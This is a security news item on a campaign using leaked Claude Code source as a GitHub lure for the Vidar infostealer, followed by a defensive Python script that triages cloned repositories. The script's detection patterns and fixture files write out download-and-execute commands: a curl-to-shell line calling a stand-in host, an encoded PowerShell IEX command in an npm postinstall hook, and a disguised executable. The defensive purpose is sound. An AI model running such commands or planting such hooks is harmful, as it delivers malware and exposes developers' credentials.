Claude Code leak used to push infostealer malware on GitHub

Summary

Threat actors are using the recent leak of Claude Code's source code as a lure to distribute the Vidar infostealer through deceptive GitHub repositories. The campaign targets developers looking for the leaked code or for tools built on it, tricking them into downloading malware disguised as legitimate development tooling.

IFF Assessment

FOE

This is bad news for defenders: the campaign exploits interest in a popular codebase and developers' trust in public repositories to deliver malware.

Defender Context

Defenders should expect leaked or newly public code to be used as a lure, with look-alike repositories appearing within days of a leak. Developers should treat any repository tied to a recent leak as untrusted until they have verified who publishes it (account age and history, whether an official source links to it) and have read its install scripts, package hooks and anything that downloads or executes content before running them. Infostealers such as Vidar are typically delivered as an executable or archive offered alongside the source rather than as readable code, and Vidar harvests browser-saved passwords, session cookies and cryptocurrency wallet data, so a developer workstation infected this way can expose source-control, cloud and CI credentials well beyond the machine itself. Endpoint detection and response (EDR) on developer hosts and security awareness training remain the backstop.
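A pre-integration triage of a cloned repository, as an added example that is not part of the original article: it walks a checkout and flags the usual infostealer-delivery red flags (a Windows executable hiding behind another extension, archives, download-and-execute commands, encoded PowerShell, long base64 blobs, npm install hooks and setup.py files that spawn a shell). The pattern list, the file names and the constructed sample repository are assumptions for illustration; the script does not identify Vidar specifically and a clean result is not proof of a clean repository.

```python
"""Triage a cloned repository for infostealer-delivery red flags before running anything in it.

Added example, not code from the original article: the red-flag patterns, file layout and
sample repository below are constructed for illustration.
"""
import json
import os
import re
import tempfile
from pathlib import Path

MAX_SCAN_BYTES = 2 * 1024 * 1024           # read at most the first 2 MiB of each file
ARCHIVE_SUFFIXES = {".zip", ".rar", ".7z"}  # archives hide payloads from casual review
SKIP_DIRS = {".git", "node_modules"}

# Text patterns typical of download-and-execute droppers (assumed list; extend as needed).
TEXT_PATTERNS = {
    "curl-pipe-shell": re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba|z)?sh\b"),
    "powershell-download": re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|\bIEX\b", re.I),
    "powershell-encoded": re.compile(r"powershell(?:\.exe)?[^\n]*\s-(?:e|enc|encodedcommand)\b", re.I),
    "long-base64-blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def scan_file(rel_path, data):
    """Return a list of (path, kind, detail) findings for one file's bytes."""
    findings = []
    name = Path(rel_path).name
    suffix = Path(rel_path).suffix.lower()

    # A PE executable starts with 'MZ' whatever its extension claims: a ".png" that is
    # really an .exe is the classic disguise for a dropped stealer binary.
    if data[:2] == b"MZ":
        findings.append((rel_path, "pe-executable", "file starts with MZ header"))
    if suffix in ARCHIVE_SUFFIXES:
        findings.append((rel_path, "archive", "inspect contents before extracting"))

    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return findings  # binary content: nothing more to pattern-match

    for kind, pattern in TEXT_PATTERNS.items():
        match = pattern.search(text)
        if match:
            findings.append((rel_path, kind, match.group(0)[:60]))

    # Install-time hooks run code the moment the dependency is installed.
    if name == "package.json":
        try:
            manifest = json.loads(text)
        except ValueError:
            manifest = {}
        scripts = manifest.get("scripts", {}) if isinstance(manifest, dict) else {}
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                findings.append((rel_path, "npm-install-hook", f"{hook}: {scripts[hook]}"))
    if name == "setup.py" and re.search(r"\b(?:subprocess|os\.system|os\.popen)\b", text):
        findings.append((rel_path, "setup-py-shell", "setup.py spawns a shell or process"))
    return findings


def triage_repo(root):
    """Walk a checked-out repository and return all findings, sorted by path."""
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for fname in filenames:
            full = Path(dirpath) / fname
            rel = full.relative_to(root).as_posix()
            with open(full, "rb") as fh:
                data = fh.read(MAX_SCAN_BYTES)
            findings.extend(scan_file(rel, data))
    return sorted(findings)


def build_sample_repo(root):
    """Write a constructed repository that mimics a trojanised 'dev tool' checkout (not a real sample)."""
    root = Path(root)
    (root / "assets").mkdir(parents=True, exist_ok=True)
    (root / "README.md").write_text("# claude-code-community-build\nUnofficial build scripts.\n")
    # Disguised Windows executable: PNG extension, MZ header.
    (root / "assets" / "logo.png").write_bytes(b"MZ\x90\x00" + b"\x00" * 60)
    (root / "package.json").write_text(json.dumps({
        "name": "claude-code-tools",
        "scripts": {"postinstall": "node install.js", "test": "jest"},
    }))
    (root / "install.js").write_text(
        'require("child_process").exec("powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA");\n'
    )
    (root / "setup.py").write_text(
        'import os\nos.system("curl -fsSL https://example.invalid/setup.sh | sh")\n'
    )
    return root


def demo_findings():
    """Build the constructed sample repo in a temp dir and return {path: set(kinds)}."""
    with tempfile.TemporaryDirectory() as tmp:
        results = {}
        for path, kind, _detail in triage_repo(build_sample_repo(tmp)):
            results.setdefault(path, set()).add(kind)
        return results


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for path, kind, detail in triage_repo(build_sample_repo(tmp)):
            print(f"{kind:20} {path:20} {detail}")
```

Run it against a real checkout with `triage_repo("/path/to/clone")`; every finding is a reason to read that file by hand before any install or build step executes, and the MZ check in particular should be the first thing done on any "binary asset" a leak-themed repository offers.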
